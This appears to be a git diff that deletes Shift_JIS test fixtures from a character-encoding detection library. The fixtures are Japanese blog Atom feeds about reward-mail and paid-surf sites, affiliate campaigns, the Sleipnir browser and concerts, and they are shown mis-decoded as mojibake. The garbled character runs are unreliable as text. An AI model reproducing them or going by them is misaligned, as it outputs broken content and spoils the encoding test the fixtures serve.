    -ƒhƒƒCƒ“‚ֽgorogoro-mail.com‚נg‚ֱ‚ִ‚אƒ†[ƒU[‚×ס‚ט•t‚­‚©‚ם‚©‚ט‚‚¹‚ס‚ּ‚ֵA
    -–{“–‚ֽ•ֿ‚¦‚½‚‚₪‚ׂ¢‚¢‚ֶv‚¢‚‚·‚×Aא­–‚©‚ח©‚י‚ֶ‚»‚ּ‚‚‚ֹ‚ָ‚י‚ּ‚ֵ‚µ‚ו‚₪‚©B
    -—¬־‚[‚י‚³‚ס‚×100‰~E3’iK‚ֵ‚·‚ּ‚ֵA‚»‚ךˆָד‚ֵ‚ָ‚¢‚ֶ‚ָ‚©‚ָ‚©µ‚µ‚¢‚ֶv‚ם‚ך‚‚·B
    -Ql‚‚ֵ‚ֹcB - - -‚»‚ך‚ֹ‘־‚µ‚ִc - -
    ַ—l‚³‚ס‚ּ•װM@”²ˆ -‚±‚ּƒTƒCƒg‚נ„‚ּט‚ֵ‰^‰c‚·‚י‚ֹ“–‚½‚ֱ‚ִ‚ֽA
    -F—l‚ּ‚²ˆ׃©‚א‚¿‚כ‚סGen‚³‚‚ּ‚²ˆ׃©‚אQl‚ֹ‚³‚¹‚ִ‚¢‚½‚¾‚«A’ט‚נ
    -‚³‚¹‚ִ‚¢‚½‚¾‚­‚ֲ‚א‚ט‚ֵ‚¢‚‚·B -
    - -SAKURA Mail‚ּ¡“_‚ֵ‚ם‚©‚ֱ‚ִ‚¢‚יƒXƒyƒbƒN‚ֽ - ֵ’ב•¥‚¢o‚µz‚ֽy100‰~z‚©‚ח!! - y500‰~zז’£‚ֱ‚ִ’™‚‚י‚ֶA•¥‚¢o‚µƒ{[ƒiƒX‰ֱZ!! - ’םƒ[ƒ‹/‚o‚s‚bƒNƒƒbƒN’P‰¿‚ֽy0.25‰~z‚©‚ח!! - ƒ_ƒEƒ“•סV—¦‚ֽy---“z‚ּ‚S’iK!! - -ƒ_ƒEƒ“•סV—¦‚±‚»‚ם‚©‚ח‚ָ‚¢‚א‚ּ‚ּA100‰~·‹אE4’iK‚ֹ‚ָ‚ֱ‚ִ‚¢‚‚µ‚½B -„‚ּ—v–]‚ֽA‚¨‚»‚ח‚­‘¼‚ּ‚‚ָ‚³‚ס‚א“¯‚¶‚ז‚₪‚ֹl‚¦‚ח‚ך‚ִ‚¢‚י‚¾‚כ‚₪‚ֶv‚¢ -‘—‚ֱ‚½‚א‚ּ‚¾‚ֱ‚½‚ּ‚ֵA‚ג‚ֽ‚ט‚»‚₪‚¢‚₪ˆ׃©‚ב½‚¢‚ס‚¾‚ָ‚ֶ‚ֲ‚­‚ֳ‚­v‚¢‚‚µ‚½B - -‚ֶ‚±‚כ‚ֵc -„‚ֽז“תuVƒTƒCƒg‚ֹ‚ֽ“o˜^‚µ‚ָ‚¢v‚ֶ¾‚ֱ‚ִ‚¢‚‚µ‚½‚×A -“o˜^‚µ‚½‚­‚ָ‚יƒXƒyƒbƒN‚ֹ‚ָ‚ט‚»‚₪‚ָ‚ּ‚ֵA“o˜^‚µ‚¿‚ב‚₪‚©‚א‚ֵ‚·cU(PP;)ƒ’ƒCƒ’ƒC]]> -
    -
    - - Cycle-Surf‚ּƒXƒXƒB - - - tag:blog.inkase.net,2006://1.30 - - 2006-01-03T07:08:16Z - 2006-01-03T07:26:28Z - - ƒAƒNƒZƒXƒAƒbƒv‚µ‚ָ‚ׂח‚¨‹א‚א‰ׂ‚°‚יƒyƒCƒhƒT[ƒtƒTƒCƒg‚ּCycle-SurfB ז... - - Gen - http://blog.inkase.net/ - - - - - ƒyƒCƒhƒT[ƒtƒTƒCƒg‚ּCycle-SurfB -ז––‚ֹMYƒAƒJƒEƒ“ƒg‚ֹ$50‚‚ַ’™‚‚ֱ‚ִ‚¢‚½‚ּ‚ֵA·‹א‚·‚י‚©‚ַ‚₪‚©”Y‚‚‚µ‚½‚× -‹‹ַ‚»‚ּ‚‚ƒAƒbƒvƒOƒ[ƒh(ƒRƒ“ƒpƒEƒ“ƒh)‚µ‚¿‚ב‚¢‚‚µ‚½B - -«¡‚ֽ‚±‚ס‚ָ´‚¶B« -$140UGƒƒ“ƒo[‚ֵ‚·פ - -ּׂ—ב‚¾‚ֶA–ˆ“ת100ƒTƒCƒgƒT[ƒt‚·‚י‚¾‚¯‚ֵ$1.4‚א’™‚‚ט‚‚·B(Cycle-Surf‚ּך‡) -‚א‚₪ש‚ֹ$10’™‚‚ֱ‚ִ‚¢‚י‚ּ‚ׂ¨•ׂ©‚ט‚©‚ֶcB -‚ֱ‚ִ‚±‚ֶ‚ֵA‚‚ָ‚³‚ס‚אƒyƒCƒhƒT[ƒt‚נn‚‚י‚ָ‚ח -’´e״‚ַָ—li“ת–{lj‚׉^‰c‚·‚יCycle-Surf‚©‚ח‚׃IƒXƒXƒ‚ֵ‚·פ - -«‚±‚¿‚ח‚©‚ח‚ַ‚₪‚¼פ« -Cycle-Surf - -•s–¾‚ָ“_‚ׂ ‚ֱ‚½‚חAƒRƒƒ“ƒg‚גƒ[ƒ‹‚ֵ‚ַ‚ס‚ַ‚ס•·‚¢‚ִ‚­‚¾‚³‚¢‚ֻB -ƒ[ƒ‹¨ Gmail]]> - - - - - DrecomRSS‚ֹ‹L–“e‚×”½‰f‚³‚ך‚ָ‚¢c - - - tag:blog.inkase.net,2006://1.24 - - 2006-01-02T12:01:00Z - 2006-01-02T16:32:23Z - - FX’²‚׳‚ִ‚½‚חAMT3.2‚×RSS1.0‚נƒTƒ|[ƒg‚µ‚ִ‚¢‚ָ‚¢‚±‚ֶ‚×”»–¾B ‚א‚ֶ‚א... - - Gen - http://blog.inkase.net/ - - - - - FX’²‚׳‚ִ‚½‚חAMT3.2‚×RSS1.0‚נƒTƒ|[ƒg‚µ‚ִ‚¢‚ָ‚¢‚±‚ֶ‚×”»–¾B -‚א‚ֶ‚א‚ֶindex.rdf‚נ“f‚«o‚³‚ָ‚¢‚±‚ֶ‚ׂם‚©‚ט‚‚µ‚½B -‚»‚ך‚ֵDrecomRSS‚ֹv”½‰f‚³‚ך‚ָ‚©‚ֱ‚½‚ּ‚ֻcBB - -‚±‚ך‚ֵ‘וה•v‚©B - - - - - yƒƒƒƒz‚¶[‚ּ•ר•‰B - - - tag:blog.inkase.net,2006://1.29 - - 2006-01-02T04:57:00Z - 2006-01-03T02:00:08Z - - “–BLOG‚ּƒAƒCƒhƒ‹Au‚¶[v‚ׂ‚ָ‚³‚ס‚ֹ¡”N‚ּ•ר•‰‚נ\‚µד‚°‚‚·B ‚ֵ‚ֽA‚ַ‚₪... - - Gen - http://blog.inkase.net/ - - - - - “–BLOG‚ּƒAƒCƒhƒ‹Au‚¶[v‚ׂ‚ָ‚³‚ס‚ֹ¡”N‚ּ•ר•‰‚נ\‚µד‚°‚‚·B - -‚ֵ‚ֽA‚ַ‚₪‚¼cII - -iƒƒF‚¶[@—¢eFGenj - - - -‚¿‚וA‚¿‚וA‚¿‚ו‚ֱ‚ֶ‚‚ֱ‚ִII - - -c -c -c -‹C‚נז‚ט’¼‚µ‚ִ‚א‚₪ˆך“xBB - -Q³B -c‚ֻ‚µ‚ו‚₪‚ֲׂII -¡”N‚ּ•ר•‰‚ֽuQ³v‚¾‚»‚₪‚ֵ‚·B - -ƒ`ƒƒƒ“ƒ`ƒƒƒ“פ - ---------- - -ƒƒƒƒƒp[ƒN‚ּלׂAƒˆƒVƒ„ƒX‚³‚ס‚ּBLOGuƒˆƒVƒ„ƒX‚ּƒƒƒƒ’Mv‚ֵ -yƒƒ‚ּ”ƒEƒPƒRƒƒ“ƒg‘ו•וWIz‚ֶ‚¢‚₪‚ּ‚נ‚ג‚ֱ‚ִ‚¢‚‚·B -ƒƒ‚נˆח‚ִ‚ִ‚¢‚י•‚ֽ”`‚¢‚ִ‚‚ִ‚ֽ‚¢‚©‚×H]]> - - - - uƒCƒ“‰ׂ’ vצJ‚µ‚‚µ‚½B - - - tag:blog.inkase.net,2006://1.25 - - 2006-01-02T04:19:46Z - 2006-01-02T16:31:22Z - - ¡”N‚©‚חA“ְׁ‚נצJ‚·‚י‚±‚ֶ‚ֹ‚µ‚‚µ‚½B ‚»‚ך‚ֹ“–‚½‚ֱ‚ִA–{‚ֹA“ְׁ‹L... - - Gen - http://blog.inkase.net/ - - - - - –{‚ֹA“ְׁ‹L˜^’ A’ּuƒCƒ“‰ׂ’ v‚נצJ‚µ‚‚µ‚½B - -©‚ִ‚¢‚½‚¾‚¯‚י‚ֶ‚ם‚©‚י‚©‚א‚µ‚ך‚‚¹‚ס‚×A‚±‚ך‚אƒXƒ^ƒCƒ‹ƒV[ƒg‚ֵ‚·i־j -TABLE‚ֵל‚ך‚־‚‚ֱ‚¿‚ב‘‚­‚ֵ‚«‚½‚ס‚ֵ‚·‚×A‹ֳ‚ט«‚ָ‚א‚ּ‚ֵBB - -100‰~·‹א‚ּƒ[ƒhƒ[ƒ‹ƒTƒCƒg‚©‚ח‘‚­‚א“‹א‚ׂ ‚ֱ‚ִ‚¢‚‚·‚ּ‚ֵ -‚·‚ֵ‚ֹXV‚נ‚µ‚ִ‚¨‚ט‚‚·B -Ql‚ֹ‚³‚ך‚ִ‚­‚¾‚³‚¢B]]> - - - - - —‚ִ‚י‚ָ‚`cBBB - - - tag:blog.inkase.net,2005://1.26 - - 2006-01-01T05:52:13Z - 2006-01-03T02:00:39Z - - –{‚ּƒTƒCƒg׀‰מ‚ּƒy[ƒW‚ֶ‚ֶ‚ִ‚א—‚ִ‚¢‚יƒTƒCƒg‚נ”­©‚µ‚‚µ‚½B «‚±‚¿‚ח‚ׂ»‚ּƒT... - - Gen - http://blog.inkase.net/ - - - - - –{‚ּƒTƒCƒg׀‰מ‚ּƒy[ƒW‚ֶ‚ֶ‚ִ‚א—‚ִ‚¢‚יƒTƒCƒg‚נ”­©‚µ‚‚µ‚½B - -«‚±‚¿‚ח‚ׂ»‚ּƒTƒCƒg« -http://gpzf2r11.fc2web.com/ - -«–{‚ּƒTƒCƒg׀‰מƒy[ƒW« -ƒAƒtƒBƒƒGƒCƒg‚ֵ‚¨¬­‚¢ - -–{‚ֽ‚‚ֶ‚ס‚ַ‚׃Xƒ^ƒCƒ‹ƒV[ƒg‚ֵ\¬‚³‚ך‚ִ‚¢‚‚·‚×A -‚±‚¿‚ח‚ּƒTƒCƒg‚ֽTABLE‚ֵל‚ֱ‚ִ‚¢‚‚·‚ּ‚ֵƒRƒs[ƒTƒCƒg‚ֵ‚ֽ‚ ‚ט‚‚¹‚סB -‚ֵ‚·‚×A׀‰מ•¶‚ָ‚ַ‚ֽ“¯‚¶•”•ׂא‚ ‚ֱ‚½‚ט‚ֶ”ק–­‚ָ´‚¶‚ֵ‚·B - -Ql‚ֹ‚µ‚ִ‚¢‚½‚¾‚¢‚ִ‚י‚±‚ֶ©‘ּ‚ֽ‹\נ‚µ‚©‚ֱ‚½‚ט‚µ‚‚·‚× -‚¿‚ו‚ֱ‚ֶ•¡G‚ָS‹«‚ֵ‚·cBB]]> - - - - - MotionLinkƒLƒƒƒ“ƒy[ƒ“II - - - tag:blog.inkase.net,2006://1.27 - - 2006-01-01T04:59:13Z - 2006-01-02T16:56:17Z - - ƒAƒtƒBƒƒGƒCƒg‚ּuMotion Linkv‚׃Lƒƒƒ“ƒy[ƒ“‚נn‚‚‚µ‚½B 1.ƒAƒt... - - Gen - http://blog.inkase.net/ - - - - - Motion Linkv‚׃Lƒƒƒ“ƒy[ƒ“‚נn‚‚‚µ‚½B - -1.ƒAƒtƒBƒƒGƒCƒgƒWƒƒƒbƒNƒ|ƒbƒgƒLƒƒƒ“ƒy[ƒ“II - -@Motion Link‚ּTOPƒy[ƒW‚ּ•\¦‰ס”‚ֹ‰‚¶‚ִ‹א‚׈’טB -@ƒAƒtƒBƒƒGƒCƒ^[‚ד\‚ֱ‚ִ‚¢‚יƒoƒi[‚ּƒNƒƒbƒN”‚׃Lƒ”װ‚ֶ‚ָ‚טA“–‘Iׂ‚׈’ט‚µ‚‚·B - -‚¿‚ָ‚‚ֹc -01/01 13:55»‚ּƒWƒƒƒbƒNƒ|ƒbƒg‹אz‚ֽ9356‰~I - - -2.׀‰מ•סV‘ו•ƒAƒbƒvIƒLƒƒƒ“ƒy[ƒ“II - -@’ם500‰~‚ּ׀‰מ•סV‚×2000‰~‚ֹƒAƒbƒv‚µ‚‚·I -@@i–׀‰מ‚µ‚½l‚×500‰~ˆָד‚ּ¬‰‚נד‚°‚½ך‡Bj - -תװ‚ֽ1/1`1/31‚ָ‚ּ‚ֵA¡“תn‚‚ֱ‚½‚־‚©‚ט‚ֵ‚·B -“o˜^‚µ‚ִ‚¢‚ָ‚¢•‚ֽA‚±‚ּ‹@‰ן‚ֹ“¢‚µ‚ִ‚‚ִ‚ֽ‚¢‚©‚ֵׂ‚·‚©H - -“o˜^‚ֽ«‚ּƒoƒi[‚©‚ח‚ַ‚₪‚¼פ -]]> - - - - - V”N–¾‚¯‚‚µ‚ִ‚¨‚‚ֵ‚ֶ‚₪‚²‚´‚¢‚‚·II - - - tag:blog.inkase.net,2006://1.28 - - 2005-12-31T15:00:00Z - 2006-01-03T02:01:08Z - - –{“ת1/1‚ֵuƒCƒ“‰ׂIBLOGvJ1”N‚ֹ‚ָ‚ט‚‚µ‚½II ¡”N‚אuƒCƒ“‰ׂIBL... - - Gen - http://blog.inkase.net/ - - - - - J1”N‚ֹ‚ָ‚ט‚‚µ‚½II -¡”N‚אuƒCƒ“‰ׂIBLOGv‚נ‚ז‚כ‚µ‚­‚¨ט‚¢‚µ‚‚·(*- -)(*_ _) - -ƒCƒ“‰ׂIBLOG -ַ—l@Gen]]> - - - - - —¬־ƒ|ƒCƒ“ƒg‚ֹ“–‘I‚µ‚‚µ‚½I - - - tag:blog.inkase.net,2005://1.22 - - 2005-09-16T14:35:15Z - 2006-01-02T14:06:22Z - - —¬־‚[‚י‚×AƒT[ƒo[ƒ_ƒEƒ“‚ּ‚¨˜l‚ׁ‚ֵu—¬־ƒ|ƒCƒ“ƒgv5P‚נ100l‚ֹƒvƒƒ[ƒ“ƒg... - - Gen - http://blog.inkase.net/ - - - - - —¬־‚[‚י‚×AƒT[ƒo[ƒ_ƒEƒ“‚ּ‚¨˜l‚ׁ‚ֵu—¬־ƒ|ƒCƒ“ƒgv5P‚נ100l‚ֹƒvƒƒ[ƒ“ƒg‚µ‚½‚ֶƒuƒƒO‚ֵ”­•\‚µ‚‚µ‚½‚×A - -‚ָ‚ס‚ֶA“–‘I‚µ‚ִ‚¢‚‚µ‚½II - -—¬־‚[‚י - - -‚א‚₪‚·‚®7000lIƒnƒCƒy[ƒX‚ֵ“o˜^ׂ‚ב‚¦‚ִ‚¢‚‚·I -‚‚¾“o˜^‚µ‚ִ‚¢‚ָ‚¢•‚ֽ‚±‚¿‚ח‚©‚ח‚ַ‚₪‚¼I -—¬־‚[‚י]]> - - - - - DoCoMoƒJ[ƒhA‚ֱ‚ִ‚‚·‚©H - - - tag:blog.inkase.net,2005://1.21 - - 2005-09-15T22:00:13Z - 2006-01-02T14:06:21Z - - ¡“ת‚ֽg‘ׁײ˜A‚ּ˜b‚נˆך‚ֲB ז“תA’‡—ַ‚­‚³‚¹‚ִ‚א‚ח‚ֱ‚ִ‚¢‚יDoCoMoך–ו‚ּg‘ׁ... - - Gen - http://blog.inkase.net/ - - - - - DoCoMoƒJ[ƒh‚נ‚ֲ‚¾‚¯‚ֵAƒhƒRƒ‚ƒvƒƒ~ƒAƒNƒ‰ƒu‚ּƒXƒe[ƒW‚×1‚ֲƒ‰ƒ“ƒNƒAƒbƒvI -@EƒJ[ƒh‚נg‚₪‚½‚ׁ‚ֹAƒhƒRƒ‚ƒ|ƒCƒ“ƒg‚ׂ½‚‚יI -@@ig‘ׁ“d˜b—¿‹אx•¥F100‰~=3`5P@ƒVƒ‡ƒbƒsƒ“ƒOF100‰~=1Pj -@Eg‘ׁ“d˜b‚ּ•´¸‚ג…”G‚ך‚ָ‚ַ‚ּ‚ֹAֵ‚10000‰~‚‚ֵ•גI -@EƒhƒRƒ‚‚ּg‘ׁ“d˜b—¿‹א‚נDoCoMoƒJ[ƒh‚ֵx•¥‚¦‚־A”N“xˆָ~‚א”N‰ן”ן–³—¿I -@@i’ם‚ֽ‰”N“x‚ּ‚–³—¿A”N“x‚ז‚ט1050‰~^”Nj - -‚ֶ‚¢‚₪‚±‚ֶ‚ֽc - -DoCoMo‚ּg‘ׁ“d˜b‚נ‚·‚ֱ‚ֶg‚ֱ‚ִ‚¢‚ך‚־ - -”N‰ן”ן‚ֽ‚¸‚ֱ‚ֶ–³—¿‚ֱ‚ִ‚±‚ֶ‚ֵ‚·‚ז‚ֻ`I - -‚ֶ‚¢‚₪‚±‚ֶ‚ֵADoCoMoƒ†[ƒU[‚ּF‚³‚סI -“¢‚µ‚ִ‚‚ִ‚ֽ‚¢‚©‚ֵׂ‚µ‚ו‚₪‚©HH - -
    «‚±‚¿‚ח‚©‚ח‚ַ‚₪‚¼«
    -]]> - -
    -
    - - Sleipnir Ver.2.00 beta5ƒƒ[ƒX - - - tag:blog.inkase.net,2005://1.20 - - 2005-09-14T13:05:20Z - 2006-01-02T14:06:20Z - - ז“תbeta4ƒƒ[ƒX‚ּ‹L–‚נ‘‚«‚‚µ‚½‚×A‘‚­‚אbeta5‚×צJ‚³‚ך‚‚µ‚½B ... - - Gen - http://blog.inkase.net/ - - - - - ו‚ָV‹@”\ -@ESleipnir Speed Launcher ‚נל¬‚µ‚½B
    -@EƒJƒXƒ^ƒ}ƒCƒY‰ֲ”\‚ָƒc[ƒ‹ƒo[‚ּƒ{ƒ^ƒ“‚נ 1.66 ‘“–‚‚ֵ‘‚ג‚µ‚½B
    -@Eץƒo[‚ּץƒGƒ“ƒWƒ“ƒƒjƒ…[‚נ•ׂW‰ֲ”\‚ֹ‚µ‚½B
    -@ERSS ƒo[‚נש“ַַ—‚ּ‚ֵ‚«‚י 1.22 ‚ֹƒAƒbƒvƒf[ƒg‚µ‚½B
    -@Eֵ‹•ֲ‚¶‚½ƒy[ƒW‚נְ‘•‚µ‚½B
    -@Eƒ|ƒbƒvƒAƒbƒvƒuƒƒbƒN‚נְ‘•‚µ‚½B
    -@Eƒy[ƒWƒuƒƒbƒNiSleipnir 1.66 ‚ּ‹ײ~ƒ^ƒCƒgƒ‹/‹ײ~URLj‚נְ‘•‚µ‚½B
    -@EƒNƒƒbƒvƒ{[ƒh‹@”\‚נְ‘•‚µ‚½B
    -@Eabout:home ‚ֵƒz[ƒ€ƒy[ƒW‚נJ‚­‚ז‚₪‚ֹ‚µ‚½B
    -@EBookmarklet ‚ֹ‘־‰‚µ‚½B
    -@Eƒ_ƒCƒAƒƒO—}§‚נְ‘•‚µ‚½B
    - -„‚×1.66‚ֵ—ַ‚­g‚ֱ‚ִ‚¢‚½[ֵ‹•ֲ‚¶‚½ƒy[ƒW]‚×ְ‘•‚³‚ך‚½‚ּ‚ֵ
    -ֲl“I‚ֹ‚ֽ‚³‚ח‚ֹg‚¢‚ג‚·‚­‚ָ‚ֱ‚½‚ֶv‚¢‚‚·B - - -צ®ƒy[ƒW - -ƒ^ƒuƒuƒ‰ƒEƒU Sleipnir צ®ƒy[ƒW(ד‹‰ׂ‚¯) - -–»AƒAƒNƒZƒX‰‘½‚ֵ”סם‚ֹd‚­‚ָ‚ֱ‚ִ‚¢‚‚·B]]> - -
    -
    - - ‹l vs ד_ - - - tag:blog.inkase.net,2005://1.19 - - 2005-09-13T13:32:45Z - 2006-01-02T14:06:19Z - - ¡“ת‚ֽ’·ט§‰c–ל‹…ךi’ּFƒrƒbƒONƒXƒ^ƒWƒAƒ€j‚ֵA‹l vs ד_‚×s‚ם‚ך‚‚µ... - - Gen - http://blog.inkase.net/ - - - - - ’·ט§‰c–ל‹…ךi’ּFƒrƒbƒONƒXƒ^ƒWƒAƒ€j‚ֵA‹l vs ד_‚×s‚ם‚ך‚‚µ‚½B -’·ט‚ֵƒvƒ–ל‹…‚ּצ®ם‚×s‚ם‚ך‚י‚ּ‚ֽ1”N‚ֹ1‰ס‚©2‰ס‚ֵ‚·‚ּ‚ֵAƒtƒ@ƒ“‚ֹ‚ֶ‚ֱ‚ִ‚ֽ‘וƒCƒxƒ“ƒg‚ֵ‚·B -ְA‚₪‚¿‚ּ‰ן׀‚ּˆך•”‚ּl‚ֽA‚¿‚ו‚ֱ‚ֶ‘‚­״‚טד‚°‚ִ©‚ֹs‚«‚‚µ‚½‚µi־j -‡‹‰‚ֽA16-1‚ֵד_‚ׂ¿‚‚µ‚½B - -—[•AO‰ס‚ט‚©‚ח‰ן׀‚ײ‹A‚י“r’†‚ֽ‘ו¬G‚ֵ‚µ‚½B -‹‚­‚ּ“¹˜H‚ֽA1‚ֲ‚ּנ·“_–ˆ‚ֹx¯‚×5l‚­‚ח‚¢‚¢‚½‚טBB -‚ִ‚©Aƒ}ƒCƒJ[‚ֵs‚ֱ‚½‚ח¬G‚·‚י‚ֱ‚ִ‚ם‚©‚ֱ‚ִ‚י‚ּ‚ֹ‚ָ`BB - -’·ט‚ֵ‚ֽAˆמ²R‚ֶ‚¢‚₪‚ֶ‚±‚כ‚ֵ–ˆ”N‰ִ‹x‚‚ֹ -uSky JamboreeiƒXƒJƒCƒWƒƒƒ“ƒ{ƒ[jv‚ֶ‚¢‚₪–לOƒƒbƒNƒCƒxƒ“ƒg‚×s‚ם‚ך‚ִ‚¢‚‚·‚× -‚»‚ּ‚ֶ‚«‚א–ˆ”N‚ּ‚ז‚₪‚ֹ‘ו¬G‚µ‚‚·B - -–ˆ‰סƒVƒƒƒgƒ‹ƒoƒX‚×o‚ִ‚י‚©‚ח‚»‚ך‚ֵs‚¯‚־‚¢‚¢‚ּ‚ֹBB - -c -‚ֶ’n³Z–¯‚ֽv‚ֱ‚ִ‚¢‚י‚ֽ‚¸‚ֵ‚·‚—‚—]]> - - - - - ‚·‚²‚¢‚¼IIƒP[ƒ^ƒCƒRƒCƒ“II - - - tag:blog.inkase.net,2005://1.18 - - 2005-09-11T14:21:41Z - 2006-01-02T14:06:19Z - - g‘ׁƒ[ƒhƒ[ƒ‹uƒP[ƒ^ƒCƒRƒCƒ“v‚ּ•סVz‚×A1150‰~‚ֹ‚ָ‚ֱ‚½‚ּ‚ֵ·‹א\¿‚נ‚µ... - - Gen - http://blog.inkase.net/ - - - - - ƒP[ƒ^ƒCƒRƒCƒ“v‚ּ•סVz‚×A1150‰~‚ֹ‚ָ‚ֱ‚½‚ּ‚ֵ·‹א\¿‚נ‚µ‚ִ‚‚‚µ‚½B -i·‹אz1000‰~{ט”—¿150‰~j - -eBANK‚ְּמ•ס“™‚נ“—ֽ‚µ‚ִA‘—M‚ֱ‚ֶB -‚ֹo‚ִ‚«‚½‰ז–‚נ©‚ִ‚ׁ‚ֱ‚­‚טII - -
    eBANK‚ײo‹א®—¹
    - -‚¦H¡‘—M‚µ‚½‚־‚ֱ‚©‚ט‚¾‚¯‚ַc - -‚½‚‚µ‚ֹƒ[ƒ‹ƒ`ƒFƒbƒN‚נ‚µ‚ִ‚‚י‚ֶAuƒC[ƒoƒ“ƒN‹גs‚©‚ח‚ּ‚¨’m‚ח‚¹[“‹א‚ׂ ‚ט‚‚µ‚½]v‚ּƒ[ƒ‹‚×II -‚±‚ך‚¼ƒƒAƒ‹ƒ^ƒCƒ€·‹אI´“®‚µ‚½I - -«ƒƒAƒ‹ƒ^ƒCƒ€·‹א‚נ–¡‚ם‚ֱ‚ִ‚‚½‚¢•‚ֽ¡‚·‚®“o˜^« -ƒP[ƒ^ƒCƒRƒCƒ“ -id—vFg‘ׁ‚ײ‘—M‚µ‚ִ‚©‚ח“o˜^‚µ‚ִ‚­‚¾‚³‚¢Bj]]> - -
    -
    - - Sleipnir[ƒXƒƒCƒvƒjƒ‹] Ver.2.00 beta4‚נg‚ֱ‚ִ‚‚‚µ‚½ - - - tag:blog.inkase.net,2005://1.17 - - 2005-09-09T13:43:07Z - 2006-01-02T14:06:13Z - - ’´‚«”\‚ָ‚ׂחƒtƒ[ƒ\ƒtƒgB _“מ‚ָƒJƒXƒ^ƒ}ƒCƒY«B ¡‚ֵ‚ֽAu“ת–{‚ֵ‚א‚ֱ‚ֶ‚א—L... - - Gen - http://blog.inkase.net/ - - - - - ’´‚«”\‚ָ‚ׂחƒtƒ[ƒ\ƒtƒgB
    - -_“מ‚ָƒJƒXƒ^ƒ}ƒCƒY«B - -¡‚ֵ‚ֽAu“ת–{‚ֵ‚א‚ֱ‚ֶ‚א—L–¼‚ָƒ^ƒuƒuƒ‰ƒEƒUv‚ֶ‚¢‚ֱ‚ִ‚א‰¾‚ֵ‚ֽ‚ָ‚¢‚ֵ‚µ‚ו‚₪B -‚»‚ס‚ָSleipnir‚ּתƒo[ƒWƒ‡ƒ“uVer.2.00v‚ּלƒo[ƒWƒ‡ƒ“ybeta4z‚×צJ‚³‚ך‚ִ‚¢‚‚·B -J”­³FFenrir & Co. - -‘‘¬Ag‚ֱ‚ִ‚‚‚µ‚½B -ˆָ‘O‚©‚חSleipnir‚נg‚ֱ‚ִ‚¢‚½„‚ֹ‚ֶ‚ֱ‚ִA -‘O‚ּybeta3z‚‚ֵ‚ֽA‚ֽ‚ֱ‚«‚ט¾‚ֱ‚ִg‚¢•¨‚ֹ‚ָ‚ט‚‚¹‚ס‚ֵ‚µ‚½B -‚»‚ך‚×ybeta4z‚ֵ‚ֽ‚ ‚י’צ“x`‚ֹ‚ָ‚ֱ‚ִ‚¢‚ִAְ—pƒƒxƒ‹‹‚­‚‚ֵ—ˆ‚ִ‚¢‚‚·B - -—ב‚¦‚־AA -„‚ֽAƒCƒ“ƒ^[ƒlƒbƒg‚ּ‚¢‚כ‚¢‚כ‚ָID‚גƒpƒXƒ[ƒh‚נ‹L‰¯‚µ‚ִַ—‚·‚י -Norton Password Manager‚ֶ‚¢‚₪ƒ\ƒtƒg‚נg‚ֱ‚ִ‚¢‚‚·B - -¡‚‚ֵ‚ֽSleipnir‚ֵ“—ֽ‚·‚יƒpƒXƒ[ƒh‚ֹ‚ֽ”½‰‚µ‚ִ‚­‚ך‚¸Ad•‚ָ‚­InternetExplorer‚ּ‚‚ֵַ—‚µ‚ִ‚¢‚‚µ‚½‚×A -ybeta4z‚ּSleipnir‚ֵ‚ֽ”½‰‚µ‚ִ‚­‚ך‚י‚ז‚₪‚ֹ‚ָ‚ט‚‚µ‚½I - -‚±‚ך‚ֽASleipnir‚ׂז‚טIE‚ֹ‹‚ֳ‚¢‚½‚ֶ‚¢‚₪‚±‚ֶ‚נ— •t‚¯‚ִ‚¢‚‚·‚ז‚ֻB -³®”ֵ‚×”­•\‚³‚ך‚י‚ּ‚בׂ‚¿‰“‚µ‚¢‚ֵ‚·B -


    Norton Password Manager -cWebƒTƒCƒg‚ּƒtƒH[ƒ€‚ֹ“—ֽ‚µ‚½ƒpƒXƒ[ƒh“™‚נ‹L‰¯‚µ‚ִAƒAƒNƒZƒX‚·‚י‚ֶ‚«‚ֹ‚ִֽ‚ׁo‚µ‚ִ‚­‚ך‚‚·B -@ƒpƒXƒ[ƒh‚נ“—ֽ‚·‚יטװ‚×ָ‚¯‚ִ‚ֶ‚ִ‚א•ײ—˜II -@‚א‚¿‚כ‚סƒ†[ƒU[ַ—‚אo—ˆ‚‚·‚ּ‚ֵAƒZƒLƒ…ƒƒeƒB“I‚ֹ‚א–ג‘ט‚ָ‚µI -@ˆך‰סg‚ֱ‚ִ‚µ‚‚₪‚ֶA‚א‚₪ט•ת‚¹‚ָ‚­‚ָ‚ט‚‚·I’´ƒIƒXƒXƒ‚ֵ‚·‚ז` -]]> - - - - - - diff --git a/chardet/tests/SHIFT_JIS/blog.paseri.ne.jp.xml b/chardet/tests/SHIFT_JIS/blog.paseri.ne.jp.xml deleted file mode 100644 index bc6d19a..0000000 --- a/chardet/tests/SHIFT_JIS/blog.paseri.ne.jp.xml +++ /dev/null @@ -1,316 +0,0 @@ - - - -ƒpƒZƒ‚ּ‚‚µ‚¢ƒ‚ƒm - -2005-12-04T00:34:56Z -‚‚µ‚¢ƒ‚ƒm‚ֽ‚¢‚כ‚¢‚כ‚ ‚ט‚‚·B‚¨‹C‚ֹ“‚ט‚ּƒ‚ƒm‚א‚¢‚כ‚¢‚כ‚ ‚ט‚‚·B -tag:blog.paseri.ne.jp,2005://2 -Movable Type -Copyright (c) 2005, usukage - -¡”N‚אA‹G‚ֹ‚ָ‚ט‚‚µ‚½Bƒx[ƒg[ƒ”ƒFƒ“:נ‹¿‹ָ‘ז9”װ - -2005-12-04T00:34:56Z -2005-12-04T00:34:01Z -tag:blog.paseri.ne.jp,2005://2.72 -2005-12-04T00:34:01Z -ƒx[ƒg[ƒ”ƒFƒ“:נ‹¿‹ָ‘ז9”װ ƒx[ƒg[ƒ”ƒFƒ“:נ‹¿‹ָ‘ז9”װ ‰‰‘tF ƒoƒCƒƒCƒg... - -usukage - -usukage@paseri.ne.jp - - - -ƒx[ƒg[ƒ”ƒFƒ“:נ‹¿‹ָ‘ז9”װ
    ƒx[ƒg[ƒ”ƒFƒ“:נ‹¿‹ָ‘ז9”װ


    ‰‰‘tF
    ƒoƒCƒƒCƒgjױ‡¥’c
    ƒVƒ…ƒƒ‹ƒcƒRƒbƒv(ƒGƒƒUƒx[ƒg)
    ƒG[ƒfƒ‹ƒ}ƒ“(ƒIƒbƒg[)
    ƒzƒbƒv(ƒnƒ“ƒX)
    ƒwƒ“ƒQƒ“(ƒGƒƒUƒx[ƒg)
    ƒoƒCƒƒCƒgjױַ·y’c
    ƒx[ƒg[ƒ”ƒFƒ“
    ƒtƒ‹ƒgƒ”ƒFƒ“ƒOƒ‰[(ƒEƒBƒ‹ƒwƒ‹ƒ€)

